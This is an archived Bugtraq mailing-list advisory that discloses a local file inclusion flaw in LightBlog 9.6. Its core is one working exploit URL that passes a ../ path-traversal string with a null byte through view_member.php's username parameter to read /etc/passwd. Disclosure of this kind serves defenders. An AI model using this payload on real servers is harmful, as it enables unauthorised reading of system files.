lightblog 9.6 local file inclusion vulnerability

To: bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: lightblog 9.6 local file inclusion vulnerability
From: "muuratsalo experimental hack lab" <muuratsalo@xxxxxxxxx>
Date: Sun, 17 Feb 2008 01:01:35 +0100
Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; bh=0+oXb2Hqibw4tlEClI04ZO7hQU2A+3qOscA1yDvOuGo=; b=pf4G3SWlR/7iind6A+/uBFByM5mm8WwBwf3aLbncA6Gr9ZwdBTpV/PuG3lhcF0Olwf/bFup+C94VpUc0eUCVxR3M8UhJ2btc1O50TQOKaIxywp3lEUypcCratc1sH9lhcC6OIqnxbdft2q6gTuRL3lACJml/W18PI2apqkl+Ca4=
Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=VSFIGZza/WN9o47Oc3pj8JJRUaf1BHRoUAD0oZ/848grcRovwu57l6+93HsONrif6n/iIVtPj7srILuFFc2eBaSFqsv0OKEDFqBhquMGIqpSjsxCVpPufBOpZ3nVfmU3qX+G1G9oDetUvV7o3zVxRgsaiICCaV1wmb7o9xE3tL8=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

lightblog 9.6 local file inclusion vulnerability

download   http://www.publicwarehouse.co.uk/php_scripts/lightblog.php

author     muuratsalo
contact    muuratsalo[at]gmail.com

exploit
http://localhost/LightBlog9.6/view_member.php?username=../../../../../../../../../../etc/passwd%00

Prev by Date: joomla SQL Injection(com_detail)
Next by Date: joomla SQL Injection(com_filebase)
Previous by thread: joomla SQL Injection(com_detail)
Next by thread: joomla SQL Injection(com_galeria)
Index(es):
- Date
- Thread